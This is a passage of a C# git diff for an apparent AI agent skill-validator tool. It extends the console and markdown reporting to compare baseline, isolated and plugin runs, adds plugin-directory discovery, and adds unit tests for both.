             Console.WriteLine();
@@ -186,70 +186,105 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
         Console.WriteLine($"    {icon} {scenario.ScenarioName}  {FormatScore(scenario.ImprovementScore)}");
 
         var b = scenario.Baseline.Metrics;
-        var s = scenario.WithSkill.Metrics;
-        var bd = scenario.Breakdown;
+        var s = scenario.SkilledIsolated.Metrics;
+        var p = scenario.SkilledPlugin?.Metrics;
 
         double bRubric = AvgRubricScore(scenario.Baseline.JudgeResult.RubricScores);
-        double sRubric = AvgRubricScore(scenario.WithSkill.JudgeResult.RubricScores);
+        double sRubric = AvgRubricScore(scenario.SkilledIsolated.JudgeResult.RubricScores);
+        double? pRubric = scenario.SkilledPlugin is { } sp ? AvgRubricScore(sp.JudgeResult.RubricScores) : null;
 
-        var metrics = new (string Label, double Value, string Absolute, bool LowerIsBetter)[]
+        // Build 3-column metric rows: baseline: X  isolated: Y (delta%)  plugin: Z (delta%)
+        var metricRows = new (string Label, string Baseline, string Isolated, string? Plugin)[]
         {
-            ("Tokens", bd.TokenReduction, $"{b.TokenEstimate} → {s.TokenEstimate}", true),
-            ("Tool calls", bd.ToolCallReduction, $"{b.ToolCallCount} → {s.ToolCallCount}", true),
-            ("Task completion", bd.TaskCompletionImprovement, $"{FmtBool(b.TaskCompleted)} → {FmtBool(s.TaskCompleted)}", false),
-            ("Time", bd.TimeReduction, $"{FmtMs(b.WallTimeMs)}{(b.TimedOut ? " ⏰" : "")} → {FmtMs(s.WallTimeMs)}{(s.TimedOut ? " ⏰" : "")}", true),
-            ("Quality (rubric)", bd.QualityImprovement, $"{bRubric:F1}/5 → {sRubric:F1}/5", false),
-            ("Quality (overall)", bd.OverallJudgmentImprovement, $"{scenario.Baseline.JudgeResult.OverallScore:F1}/5 → {scenario.WithSkill.JudgeResult.OverallScore:F1}/5", false),
-            ("Errors", bd.ErrorReduction, $"{b.ErrorCount} → {s.ErrorCount}", true),
+            ("Tokens",
+             $"{b.TokenEstimate}",
+             FormatMetricWithDelta(s.TokenEstimate, b.TokenEstimate, true),
+             p is not null ? FormatMetricWithDelta(p.TokenEstimate, b.TokenEstimate, true) : null),
+            ("Tool calls",
+             $"{b.ToolCallCount}",
+             FormatMetricWithDelta(s.ToolCallCount, b.ToolCallCount, true),
+             p is not null ? FormatMetricWithDelta(p.ToolCallCount, b.ToolCallCount, true) : null),
+            ("Task completion",
+             FmtBool(b.TaskCompleted),
+             FmtBool(s.TaskCompleted),
+             p is not null ? FmtBool(p.TaskCompleted) : null),
+            ("Time",
+             $"{FmtMs(b.WallTimeMs)}{(b.TimedOut ? " ⏰" : "")}",
+             $"{FmtMs(s.WallTimeMs)}{(s.TimedOut ? " ⏰" : "")}{FormatPctDelta(s.WallTimeMs, b.WallTimeMs, true)}",
+             p is not null ? $"{FmtMs(p.WallTimeMs)}{(p.TimedOut ? " ⏰" : "")}{FormatPctDelta(p.WallTimeMs, b.WallTimeMs, true)}" : null),
+            ("Quality (rubric)",
+             $"{bRubric:F1}/5",
+             $"{sRubric:F1}/5{FormatPctDelta(sRubric, bRubric, false)}",
+             pRubric is not null ? $"{pRubric:F1}/5{FormatPctDelta(pRubric.Value, bRubric, false)}" : null),
+            ("Quality (overall)",
+             $"{scenario.Baseline.JudgeResult.OverallScore:F1}/5",
+             $"{scenario.SkilledIsolated.JudgeResult.OverallScore:F1}/5{FormatPctDelta(scenario.SkilledIsolated.JudgeResult.OverallScore, scenario.Baseline.JudgeResult.OverallScore, false)}",
+             scenario.SkilledPlugin is not null ? $"{scenario.SkilledPlugin.JudgeResult.OverallScore:F1}/5{FormatPctDelta(scenario.SkilledPlugin.JudgeResult.OverallScore, scenario.Baseline.JudgeResult.OverallScore, false)}" : null),
+            ("Errors",
+             $"{b.ErrorCount}",
+             FormatMetricWithDelta(s.ErrorCount, b.ErrorCount, true),
+             p is not null ? FormatMetricWithDelta(p.ErrorCount, b.ErrorCount, true) : null),
         };
 
+        bool hasPlugin = scenario.SkilledPlugin is not null;
+
         // Show timeout warnings prominently before the metrics table
-        if (b.TimedOut || s.TimedOut)
+        if (b.TimedOut || s.TimedOut || p?.TimedOut == true)
         {
             var parts = new List<string>();
             if (b.TimedOut) parts.Add("baseline");
-            if (s.TimedOut) parts.Add("with-skill");
+            if (s.TimedOut) parts.Add("isolated");
+            if (p?.TimedOut == true) parts.Add("plugin");
             Console.WriteLine($"      \x1b[31;1m⏰ TIMEOUT\x1b[0m — {string.Join(" and ", parts)} run(s) hit the scenario timeout limit");
         }
 
-        foreach (var (label, value, absolute, lowerIsBetter) in metrics)
+        foreach (var (label, baseline, isolated, plugin) in metricRows)
         {
-            var color = value > 0 ? "\x1b[32m" : value < 0 ? "\x1b[31m" : "\x1b[2m";
-            double displayValue = lowerIsBetter ? -value : value;
-            Console.WriteLine($"      \x1b[2m{label,-20}\x1b[0m {color}{FormatDelta(displayValue),-10}\x1b[0m \x1b[2m{absolute}\x1b[0m");
+            var line = $"      \x1b[2m{label,-20}\x1b[0m baseline: \x1b[2m{baseline,-12}\x1b[0m isolated: {isolated,-20}";
+            if (hasPlugin)
+                line += $" plugin: {plugin ?? "—"}";
+            Console.WriteLine(line);
         }
 
-        // Skill activation info
-        if (scenario.SkillActivation is { } sa)
+        // Effective score line (when plugin run exists, show min)
+        if (hasPlugin)
+        {
+            var isoScore = scenario.IsolatedImprovementScore;
+            var plugScore = scenario.PluginImprovementScore;
+            Console.WriteLine($"      \x1b[1mEffective score:\x1b[0m min(isolated={FormatPct(isoScore)}, plugin={FormatPct(plugScore)}) = {FormatPct(scenario.ImprovementScore)}");
+        }
+
+        // Skill activation info — isolated
+        if (scenario.SkillActivationIsolated is { } saIso)
         {
             Console.WriteLine();
-            if (sa.Activated)
-            {
-                var parts = new List<string>();
-                if (sa.DetectedSkills.Count > 0) parts.Add(string.Join(", ", sa.DetectedSkills));
-                if (sa.ExtraTools.Count > 0) parts.Add("extra tools: " + string.Join(", ", sa.ExtraTools));
-                Console.WriteLine($"      \x1b[2mSkill activated:\x1b[0m \x1b[32m{(parts.Count > 0 ? string.Join("; ", parts) : "yes")}\x1b[0m");
-            }
-            else
-            {
-                if (!scenario.ExpectActivation)
-                    Console.WriteLine("      \x1b[36mℹ️  Skill correctly NOT activated (negative test)\x1b[0m");
-                else
-                    Console.WriteLine("      \x1b[33m⚠️  Skill was NOT activated\x1b[0m");
-            }
+            ReportActivation(saIso, "Isolated", scenario.ExpectActivation);
+        }
+
+        // Skill activation info — plugin
+        if (scenario.SkillActivationPlugin is { } saPlug)
+        {
+            ReportActivation(saPlug, "Plugin", scenario.ExpectActivation);
         }
 
         Console.WriteLine();
 
         var bj = scenario.Baseline.JudgeResult;
-        var sj = scenario.WithSkill.JudgeResult;
-        double scoreDelta = sj.OverallScore - bj.OverallScore;
-        var deltaStr = scoreDelta > 0 ? $"\x1b[32m+{scoreDelta:F1}\x1b[0m" :
-            scoreDelta < 0 ? $"\x1b[31m{scoreDelta:F1}\x1b[0m" : "\x1b[2m±0\x1b[0m";
+        var sj = scenario.SkilledIsolated.JudgeResult;
+        var pj = scenario.SkilledPlugin?.JudgeResult;
+        double scoreDeltaIso = sj.OverallScore - bj.OverallScore;
+        var deltaStrIso = FormatColorDelta(scoreDeltaIso);
 
         var bTimeout = b.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
         var sTimeout = s.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
-        Console.WriteLine($"      \x1b[1mOverall:\x1b[0m {bj.OverallScore:F1}{bTimeout} → {sj.OverallScore:F1}{sTimeout} ({deltaStr})");
+        var overallLine = $"      \x1b[1mOverall:\x1b[0m {bj.OverallScore:F1}{bTimeout} → isolated: {sj.OverallScore:F1}{sTimeout} ({deltaStrIso})";
+        if (pj is not null)
+        {
+            double scoreDeltaPlug = pj.OverallScore - bj.OverallScore;
+            var pTimeout = p!.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
+            overallLine += $"  plugin: {pj.OverallScore:F1}{pTimeout} ({FormatColorDelta(scoreDeltaPlug)})";
+        }
+        Console.WriteLine(overallLine);
         Console.WriteLine();
 
         // Baseline judge
@@ -269,8 +304,8 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
 
         Console.WriteLine();
 
-        // With-skill judge
-        Console.WriteLine($"      \x1b[35m─── With-Skill Judge\x1b[0m \x1b[35;1m{sj.OverallScore:F1}/5\x1b[0m{sTimeout} \x1b[35m───\x1b[0m");
+        // With-skill judge (Isolated)
+        Console.WriteLine($"      \x1b[35m─── With-Skill Judge (Isolated)\x1b[0m \x1b[35;1m{sj.OverallScore:F1}/5\x1b[0m{sTimeout} \x1b[35m───\x1b[0m");
         Console.WriteLine($"      \x1b[2m{sj.OverallReasoning}\x1b[0m");
         if (sj.RubricScores.Count > 0)
         {
@@ -288,6 +323,29 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
         }
         Console.WriteLine();
 
+        // With-skill judge (Plugin) — only if plugin run exists
+        if (pj is not null)
+        {
+            var pTimeout = p!.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
+            Console.WriteLine($"      \x1b[32m─── With-Skill Judge (Plugin)\x1b[0m \x1b[32;1m{pj.OverallScore:F1}/5\x1b[0m{pTimeout} \x1b[32m───\x1b[0m");
+            Console.WriteLine($"      \x1b[2m{pj.OverallReasoning}\x1b[0m");
+            if (pj.RubricScores.Count > 0)
+            {
+                Console.WriteLine();
+                foreach (var rs in pj.RubricScores)
+                {
+                    var scoreColor = rs.Score >= 4 ? "\x1b[32m" : rs.Score >= 3 ? "\x1b[33m" : "\x1b[31m";
+                    var baselineRs = bj.RubricScores.FirstOrDefault(b =>
+                        string.Equals(b.Criterion, rs.Criterion, StringComparison.OrdinalIgnoreCase));
+                    var comparison = baselineRs is not null ? $"\x1b[2m (was {baselineRs.Score}/5)\x1b[0m" : "";
+                    Console.WriteLine($"        {scoreColor}\x1b[1m{rs.Score}/5\x1b[0m{comparison}  \x1b[1m{rs.Criterion}\x1b[0m");
+                    if (!string.IsNullOrEmpty(rs.Reasoning))
+                        Console.WriteLine($"              \x1b[2m{rs.Reasoning}\x1b[0m");
+                }
+            }
+            Console.WriteLine();
+        }
+
         // Pairwise judge results
         if (scenario.PairwiseResult is { } pw)
         {
@@ -317,11 +375,62 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
             Console.WriteLine();
             Console.WriteLine("      \x1b[2mBaseline output:\x1b[0m");
             Console.WriteLine(IndentBlock(scenario.Baseline.Metrics.AgentOutput.Length > 0 ? scenario.Baseline.Metrics.AgentOutput : "(no output)", 8));
-            Console.WriteLine("      \x1b[2mWith-skill output:\x1b[0m");
-            Console.WriteLine(IndentBlock(scenario.WithSkill.Metrics.AgentOutput.Length > 0 ? scenario.WithSkill.Metrics.AgentOutput : "(no output)", 8));
+            Console.WriteLine("      \x1b[2mWith-skill output (isolated):\x1b[0m");
+            Console.WriteLine(IndentBlock(scenario.SkilledIsolated.Metrics.AgentOutput.Length > 0 ? scenario.SkilledIsolated.Metrics.AgentOutput : "(no output)", 8));
+            if (scenario.SkilledPlugin is { } pluginRun)
+            {
+                Console.WriteLine("      \x1b[2mWith-skill output (plugin):\x1b[0m");
+                Console.WriteLine(IndentBlock(pluginRun.Metrics.AgentOutput.Length > 0 ? pluginRun.Metrics.AgentOutput : "(no output)", 8));
+            }
         }
     }
 
+    private static void ReportActivation(SkillActivationInfo sa, string label, bool expectActivation)
+    {
+        if (sa.Activated)
+        {
+            var parts = new List<string>();
+            if (sa.DetectedSkills.Count > 0) parts.Add(string.Join(", ", sa.DetectedSkills));
+            if (sa.ExtraTools.Count > 0) parts.Add("extra tools: " + string.Join(", ", sa.ExtraTools));
+            Console.WriteLine($"      \x1b[2mSkill activated ({label}):\x1b[0m \x1b[32m{(parts.Count > 0 ? string.Join("; ", parts) : "yes")}\x1b[0m");
+        }
+        else
+        {
+            if (!expectActivation)
+                Console.WriteLine($"      \x1b[36mℹ️  Skill correctly NOT activated ({label}, negative test)\x1b[0m");
+            else
+                Console.WriteLine($"      \x1b[33m⚠️  Skill was NOT activated ({label})\x1b[0m");
+        }
+    }
+
+    /// <summary>Formats a metric value with a percentage delta from baseline, e.g. "800 (-33%)".</summary>
+    private static string FormatMetricWithDelta(double value, double baseline, bool lowerIsBetter)
+    {
+        if (baseline == 0) return $"{value}";
+        double pctChange = (value - baseline) / baseline * 100;
+        var sign = pctChange > 0 ? "+" : "";
+        bool isGood = lowerIsBetter ? pctChange < 0 : pctChange > 0;
+        var color = isGood ? "\x1b[32m" : pctChange == 0 ? "" : "\x1b[31m";
+        var reset = string.IsNullOrEmpty(color) ? "" : "\x1b[0m";
+        return $"{value} {color}({sign}{pctChange:F0}%){reset}";
+    }
+
+    /// <summary>Returns a parenthesized percentage delta string, e.g. " (-33%)".</summary>
+    private static string FormatPctDelta(double value, double baseline, bool lowerIsBetter)
+    {
+        if (baseline == 0) return "";
+        double pctChange = (value - baseline) / baseline * 100;
+        var sign = pctChange > 0 ? "+" : "";
+        bool isGood = lowerIsBetter ? pctChange < 0 : pctChange > 0;
+        var color = isGood ? "\x1b[32m" : pctChange == 0 ? "" : "\x1b[31m";
+        var reset = string.IsNullOrEmpty(color) ? "" : "\x1b[0m";
+        return $" {color}({sign}{pctChange:F0}%){reset}";
+    }
+
+    private static string FormatColorDelta(double delta) =>
+        delta > 0 ? $"\x1b[32m+{delta:F1}\x1b[0m" :
+        delta < 0 ? $"\x1b[31m{delta:F1}\x1b[0m" : "\x1b[2m±0\x1b[0m";
+
     // --- Markdown reporter ---
 
     public static string GenerateMarkdownSummary(
@@ -356,6 +465,7 @@ public static string GenerateMarkdownSummary(
 
         var footnotes = new List<string>();
         var tableRows = new List<string>();
+        bool anyPluginRun = verdicts.Any(v => v.Scenarios.Any(s => s.SkilledPlugin is not null));
 
         foreach (var v in verdicts)
         {
@@ -363,33 +473,42 @@ public static string GenerateMarkdownSummary(
             foreach (var s in v.Scenarios)
             {
                 var baseScore = s.Baseline?.JudgeResult?.OverallScore;
-                var skillScore = s.WithSkill?.JudgeResult?.OverallScore;
+                var isoScore = s.SkilledIsolated?.JudgeResult?.OverallScore;
+                var plugScore = s.SkilledPlugin?.JudgeResult?.OverallScore;
                 var bTimedOut = s.Baseline?.Metrics?.TimedOut == true;
-                var sTimedOut = s.WithSkill?.Metrics?.TimedOut == true;
+                var isoTimedOut = s.SkilledIsolated?.Metrics?.TimedOut == true;
+                var plugTimedOut = s.SkilledPlugin?.Metrics?.TimedOut == true;
+
+                string isoQualityCol = FormatQualityCell(baseScore, isoScore, bTimedOut, isoTimedOut, out double? isoQualityDelta);
+                double? plugQualityDelta = null;
+                string plugQualityCol = "";
+                if (anyPluginRun)
+                {
+                    plugQualityCol = FormatQualityCell(baseScore, plugScore, bTimedOut, plugTimedOut, out plugQualityDelta);
+                }
 
-                string qualityCol = FormatQualityCell(baseScore, skillScore, bTimedOut, sTimedOut, out double? qualityDelta);
+                // Use the effective (worse) run's quality delta for footnotes
+                bool pluginIsEffective = s.SkilledPlugin is not null && s.PluginImprovementScore < s.IsolatedImprovementScore;
+                double? qualityDelta = pluginIsEffective ? plugQualityDelta : isoQualityDelta;
                 var icon = s.ImprovementScore > 0 ? "✅" : s.ImprovementScore < 0 ? "❌" : "🟡";
 
+                // Skills loaded column — show both isolated and plugin activation
                 string skillsCol = "—";
-                if (s.SkillActivation is { } sa)
+                if (s.SkillActivationIsolated is { } saIso)
                 {
-                    if (sa.Activated)
-                    {
-                        var parts = new List<string>();
-                        if (sa.DetectedSkills.Count > 0) parts.AddRange(sa.DetectedSkills);
-                        if (sa.ExtraTools.Count > 0) parts.Add("tools: " + string.Join(", ", sa.ExtraTools));
-                        skillsCol = parts.Count > 0 ? "✅ " + string.Join("; ", parts) : "✅";
-                    }
-                    else
-                    {
-                        skillsCol = s.ExpectActivation ? "⚠️ NOT ACTIVATED" : "ℹ️ not activated (expected)";
-                    }
+                    skillsCol = FormatActivationCell(saIso, s.ExpectActivation);
                 }
                 else if (skillNotActivated)
                 {
                     skillsCol = "⚠️ NOT ACTIVATED";
                 }
 
+                if (anyPluginRun && s.SkillActivationPlugin is { } saPlug)
+                {
+                    string plugActivation = FormatActivationCell(saPlug, s.ExpectActivation);
+                    skillsCol += $" / {plugActivation}";
+                }
+
                 var footnote = BuildVerdictFootnote(s, qualityDelta);
                 string verdictCol = icon;
                 if (footnote is not null)
@@ -399,14 +518,25 @@ public static string GenerateMarkdownSummary(
                     verdictCol = $"{icon} <a href=\"#user-content-fn-{n}\" id=\"ref-{n}\">[{n}]</a>";
                 }
 
-                tableRows.Add($"| {v.SkillName} | {s.ScenarioName} | {qualityCol} | {skillsCol} | {FormatOverfitCell(v.OverfittingResult)} | {verdictCol} |");
+                var row = anyPluginRun
+                    ? $"| {v.SkillName} | {s.ScenarioName} | {isoQualityCol} | {plugQualityCol} | {skillsCol} | {FormatOverfitCell(v.OverfittingResult)} | {verdictCol} |"
+                    : $"| {v.SkillName} | {s.ScenarioName} | {isoQualityCol} | {skillsCol} | {FormatOverfitCell(v.OverfittingResult)} | {verdictCol} |";
+                tableRows.Add(row);
             }
         }
 
         if (tableRows.Count > 0)
         {
-            sb.AppendLine("| Skill | Scenario | Quality | Skills Loaded | Overfit | Verdict |");
-            sb.AppendLine("|-------|----------|---------|---------------|---------|---------|");
+            if (anyPluginRun)
+            {
+                sb.AppendLine("| Skill | Scenario | Quality (Isolated) | Quality (Plugin) | Skills Loaded | Overfit | Verdict |");
+                sb.AppendLine("|-------|----------|--------------------|------------------|---------------|---------|---------|");
+            }
+            else
+            {
+                sb.AppendLine("| Skill | Scenario | Quality | Skills Loaded | Overfit | Verdict |");
+                sb.AppendLine("|-------|----------|---------|---------------|---------|---------|");
+            }
             foreach (var row in tableRows)
                 sb.AppendLine(row);
         }
@@ -419,7 +549,7 @@ public static string GenerateMarkdownSummary(
         }
 
         bool anyTimeout = verdicts.Any(v => v.Scenarios.Any(s =>
-            (s.Baseline?.Metrics?.TimedOut == true) || (s.WithSkill?.Metrics?.TimedOut == true)));
+            (s.Baseline?.Metrics?.TimedOut == true) || (s.SkilledIsolated?.Metrics?.TimedOut == true) || (s.SkilledPlugin?.Metrics?.TimedOut == true)));
         if (anyTimeout)
             sb.AppendLine("\n> ⏰ **timeout** — run hit the scenario timeout limit; scoring may be impacted by aborting model execution before it could produce its full output");
 
@@ -493,23 +623,46 @@ private static async Task ReportMarkdown(
                 foreach (var rs in scenario.Baseline.JudgeResult.RubricScores)
                     judgeReport.AppendLine($"- **{rs.Criterion}**: {rs.Score}/5 — {rs.Reasoning}");
                 judgeReport.AppendLine();
-                judgeReport.AppendLine("## With-Skill Judge");
-                judgeReport.AppendLine($"Overall Score: {scenario.WithSkill.JudgeResult.OverallScore}/5");
-                judgeReport.AppendLine($"Reasoning: {scenario.WithSkill.JudgeResult.OverallReasoning}");
+                judgeReport.AppendLine("## With-Skill Judge (Isolated)");
+                judgeReport.AppendLine($"Overall Score: {scenario.SkilledIsolated.JudgeResult.OverallScore}/5");
+                judgeReport.AppendLine($"Reasoning: {scenario.SkilledIsolated.JudgeResult.OverallReasoning}");
                 judgeReport.AppendLine();
-                foreach (var rs in scenario.WithSkill.JudgeResult.RubricScores)
+                foreach (var rs in scenario.SkilledIsolated.JudgeResult.RubricScores)
                     judgeReport.AppendLine($"- **{rs.Criterion}**: {rs.Score}/5 — {rs.Reasoning}");
                 judgeReport.AppendLine();
+
+                // Plugin judge section (if plugin run exists)
+                if (scenario.SkilledPlugin is { } pluginRun)
+                {
+                    judgeReport.AppendLine("## With-Skill Judge (Plugin)");
+                    judgeReport.AppendLine($"Overall Score: {pluginRun.JudgeResult.OverallScore}/5");
+                    judgeReport.AppendLine($"Reasoning: {pluginRun.JudgeResult.OverallReasoning}");
+                    judgeReport.AppendLine();
+                    foreach (var rs in pluginRun.JudgeResult.RubricScores)
+                        judgeReport.AppendLine($"- **{rs.Criterion}**: {rs.Score}/5 — {rs.Reasoning}");
+                    judgeReport.AppendLine();
+                }
+
                 judgeReport.AppendLine("## Baseline Agent Output");
                 judgeReport.AppendLine("```");
                 judgeReport.AppendLine(scenario.Baseline.Metrics.AgentOutput.Length > 0 ? scenario.Baseline.Metrics.AgentOutput : "(no output)");
                 judgeReport.AppendLine("```");
                 judgeReport.AppendLine();
-                judgeReport.AppendLine("## With-Skill Agent Output");
+                judgeReport.AppendLine("## With-Skill Agent Output (Isolated)");
                 judgeReport.AppendLine("```");
-                judgeReport.AppendLine(scenario.WithSkill.Metrics.AgentOutput.Length > 0 ? scenario.WithSkill.Metrics.AgentOutput : "(no output)");
+                judgeReport.AppendLine(scenario.SkilledIsolated.Metrics.AgentOutput.Length > 0 ? scenario.SkilledIsolated.Metrics.AgentOutput : "(no output)");
                 judgeReport.AppendLine("```");
 
+                // Plugin agent output (if plugin run exists)
+                if (scenario.SkilledPlugin is { } pluginRunOutput)
+                {
+                    judgeReport.AppendLine();
+                    judgeReport.AppendLine("## With-Skill Agent Output (Plugin)");
+                    judgeReport.AppendLine("```");
+                    judgeReport.AppendLine(pluginRunOutput.Metrics.AgentOutput.Length > 0 ? pluginRunOutput.Metrics.AgentOutput : "(no output)");
+                    judgeReport.AppendLine("```");
+                }
+
                 await File.WriteAllTextAsync(Path.Combine(skillDir, $"{scenarioSlug}.md"), judgeReport.ToString());
             }
         }
@@ -646,6 +799,19 @@ internal static string FormatQualityCell(
         return $"{baseFmt} \u2192 {skillFmt}";
     }
 
+    /// <summary>Formats an activation info object into a markdown cell string.</summary>
+    internal static string FormatActivationCell(SkillActivationInfo sa, bool expectActivation)
+    {
+        if (sa.Activated)
+        {
+            var parts = new List<string>();
+            if (sa.DetectedSkills.Count > 0) parts.AddRange(sa.DetectedSkills);
+            if (sa.ExtraTools.Count > 0) parts.Add("tools: " + string.Join(", ", sa.ExtraTools));
+            return parts.Count > 0 ? "✅ " + string.Join("; ", parts) : "✅";
+        }
+        return expectActivation ? "⚠️ NOT ACTIVATED" : "ℹ️ not activated (expected)";
+    }
+
     /// <summary>
     /// Returns a footnote string when the verdict (based on composite ImprovementScore)
     /// disagrees with the quality delta shown in the table, or null if no explanation is needed.
@@ -693,11 +859,18 @@ internal static string FormatQualityCell(
             })
             .ToList();
 
+        // Determine which run is the effective (worse) one for raw metric values
+        bool pluginIsWorse = s.SkilledPlugin is not null && s.PluginImprovementScore < s.IsolatedImprovementScore;
+        string runLabel = pluginIsWorse ? "Plugin" : "Isolated";
+
         // Format a contributor label with raw metric values when available
         string FormatContributor(string label)
         {
             var bm = s.Baseline?.Metrics;
-            var sm = s.WithSkill?.Metrics;
+            // Use the effective (worse) run's metrics for raw values
+            var sm = pluginIsWorse
+                ? s.SkilledPlugin?.Metrics
+                : s.SkilledIsolated?.Metrics;
             if (bm is null || sm is null) return label;
 
             string? raw = label switch
@@ -727,7 +900,7 @@ string FormatContributor(string label)
                 ? string.Join(", ", negatives)
                 : "efficiency metrics";
             string qualityDesc = qualityPositive ? "Quality improved" : "Quality unchanged";
-            return $"{qualityDesc} but weighted score is {compositeStr} due to: {factors}";
+            return $"({runLabel}) {qualityDesc} but weighted score is {compositeStr} due to: {factors}";
         }
 
         if (verdictPositive && qualityNegative)
@@ -741,7 +914,7 @@ string FormatContributor(string label)
             string factors = positives.Count > 0
                 ? string.Join(", ", positives)
                 : "efficiency metrics";
-            return $"Quality dropped but weighted score is {compositeStr} due to: {factors}";
+            return $"({runLabel}) Quality dropped but weighted score is {compositeStr} due to: {factors}";
         }
 
         return null;
diff --git a/eng/skill-validator/src/Services/SkillDiscovery.cs b/eng/skill-validator/src/Services/SkillDiscovery.cs
index 24dad5512c..8ef65bfd97 100644
--- a/eng/skill-validator/src/Services/SkillDiscovery.cs
+++ b/eng/skill-validator/src/Services/SkillDiscovery.cs
@@ -277,6 +277,67 @@ internal static (EvalSchema.RawAgentFrontmatter Metadata, string Body) ParseAgen
 
     // --- Plugin discovery ---
 
+    /// <summary>
+    /// For a given skill, find its plugin root directory (the directory containing plugin.json).
+    /// Returns the plugin root path and the parsed PluginInfo.
+    /// Returns null if no plugin.json is found or if it is malformed.
+    /// </summary>
+    public static (string PluginRoot, PluginInfo Plugin)? FindPluginContext(SkillInfo skill)
+    {
+        var pluginRoot = FindPluginRoot(skill.Path);
+        if (pluginRoot is null) return null;
+
+        var pluginJsonPath = Path.Combine(pluginRoot, "plugin.json");
+        PluginInfo? plugin;
+        try
+        {
+            plugin = PluginValidator.ParsePluginJson(pluginJsonPath);
+        }
+        catch (JsonException)
+        {
+            // Malformed plugin.json — treated as "no plugin" here;
+            // the later DiscoverPlugins/ValidatePlugin path will surface
+            // the user-friendly error message.
+            return null;
+        }
+        if (plugin is null) return null;
+
+        return (pluginRoot, plugin);
+    }
+
+    /// <summary>
+    /// Groups discovered skills by their parent plugin root.
+    /// Returns a dictionary: pluginRoot -> (PluginInfo, skills[])
+    /// Skills without a plugin are reported as errors and excluded.
+    /// </summary>
+    public static (Dictionary<string, (PluginInfo Plugin, List<SkillInfo> Skills)> Groups, List<string> Errors)
+        GroupSkillsByPlugin(IReadOnlyList<SkillInfo> skills)
+    {
+        var groups = new Dictionary<string, (PluginInfo Plugin, List<SkillInfo> Skills)>(
+            StringComparer.OrdinalIgnoreCase);
+        var errors = new List<string>();
+
+        foreach (var skill in skills)
+        {
+            var context = FindPluginContext(skill);
+            if (context is null)
+            {
+                errors.Add($"Skill '{skill.Name}' at '{skill.Path}' is not inside a plugin directory (no valid plugin.json found: missing or malformed). All skills must belong to a plugin.");
+                continue;
+            }
+
+            var (root, plugin) = context.Value;
+            if (!groups.TryGetValue(root, out var group))
+            {
+                group = (plugin, []);
+                groups[root] = group;
+            }
+            group.Skills.Add(skill);
+        }
+
+        return (groups, errors);
+    }
+
     /// <summary>
     /// Discover plugin.json files from plugin directories reachable from the given paths.
     /// </summary>
diff --git a/eng/skill-validator/tests/ComparatorTests.cs b/eng/skill-validator/tests/ComparatorTests.cs
index 8e999913b5..c11873c1f3 100644
--- a/eng/skill-validator/tests/ComparatorTests.cs
+++ b/eng/skill-validator/tests/ComparatorTests.cs
@@ -201,6 +201,37 @@ public void MarksAsNotSignificantWhenPerRunScoresSpanZero()
         Assert.False(verdict.IsSignificant!.Value);
         Assert.Contains("not statistically significant", verdict.Reason);
     }
+    [Fact]
+    public void FailsWhenPluginRunRegressesTaskCompletion()
+    {
+        var baseline = MakeRunResult(taskCompleted: true, overallScore: 3);
+        var withSkill = MakeRunResult(taskCompleted: true, tokenEstimate: 100, overallScore: 5);
+        var comparison = Comparator.CompareScenario("test", baseline, withSkill);
+        // Simulate plugin run that failed completion
+        comparison = new ScenarioComparison
+        {
+            ScenarioName = comparison.ScenarioName,
+            Baseline = comparison.Baseline,
+            SkilledIsolated = comparison.SkilledIsolated,
+            SkilledPlugin = MakeRunResult(taskCompleted: false, tokenEstimate: 100, overallScore: 5),
+            ImprovementScore = comparison.ImprovementScore,
+            Breakdown = comparison.Breakdown,
+        };
+
+        var verdict = Comparator.ComputeVerdict(MockSkill, [comparison], 0.0, true);
+        Assert.False(verdict.Passed);
+        Assert.Contains("regressed", verdict.Reason);
+    }
+
+    [Fact]
+    public void CompareScenarioSetsPluginToNull()
+    {
+        var baseline = MakeRunResult();
+        var withSkill = MakeRunResult(tokenEstimate: 500, overallScore: 5);
+        var comparison = Comparator.CompareScenario("test", baseline, withSkill);
+        // CompareScenario is a utility for single-run comparison; SkilledPlugin should be null
+        Assert.Null(comparison.SkilledPlugin);
+    }
 }
 
 public class CompareScenarioWithPairwiseTests
diff --git a/eng/skill-validator/tests/DiscoveryTests.cs b/eng/skill-validator/tests/DiscoveryTests.cs
index d9613b867e..e260744212 100644
--- a/eng/skill-validator/tests/DiscoveryTests.cs
+++ b/eng/skill-validator/tests/DiscoveryTests.cs
@@ -1,4 +1,5 @@
 using SkillValidator.Services;
+using SkillValidator.Models;
 
 namespace SkillValidator.Tests;
 
@@ -223,3 +224,95 @@ public async Task ResolveEvalPathPrefersFlatLayout()
         }
     }
 }
+
+public class GroupSkillsByPluginTests
+{
+    [Fact]
+    public void GroupsSkillsUnderSamePlugin()
+    {
+        var tmpDir = Path.Combine(Path.GetTempPath(), $"group-test-{Guid.NewGuid():N}");
+        var pluginDir = Path.Combine(tmpDir, "my-plugin");
+        var skillDir1 = Path.Combine(pluginDir, "skills", "skill-a");
+        var skillDir2 = Path.Combine(pluginDir, "skills", "skill-b");
+        Directory.CreateDirectory(skillDir1);
+        Directory.CreateDirectory(skillDir2);
+        try
+        {
+            File.WriteAllText(Path.Combine(pluginDir, "plugin.json"), """{ "name": "my-plugin" }""");
+
+            var skills = new[]
+            {
+                new SkillInfo("skill-a", "A", skillDir1, Path.Combine(skillDir1, "SKILL.md"), "# A", null, null, null),
+                new SkillInfo("skill-b", "B", skillDir2, Path.Combine(skillDir2, "SKILL.md"), "# B", null, null, null),
+            };
+
+            var (groups, errors) = SkillDiscovery.GroupSkillsByPlugin(skills);
+            Assert.Empty(errors);
+            Assert.Single(groups);
+            var (plugin, grouped) = groups.Values.First();
+            Assert.Equal(2, grouped.Count);
+        }
+        finally
+        {
+            Directory.Delete(tmpDir, true);
+        }
+    }
+
+    [Fact]
+    public void ReportsErrorForStandaloneSkill()
+    {
+        var tmpDir = Path.Combine(Path.GetTempPath(), $"group-test-{Guid.NewGuid():N}");
+        Directory.CreateDirectory(tmpDir);
+        try
+        {
+            // No plugin.json in parents
+            var skill = new SkillInfo("orphan", "O", tmpDir, Path.Combine(tmpDir, "SKILL.md"), "# O", null, null, null);
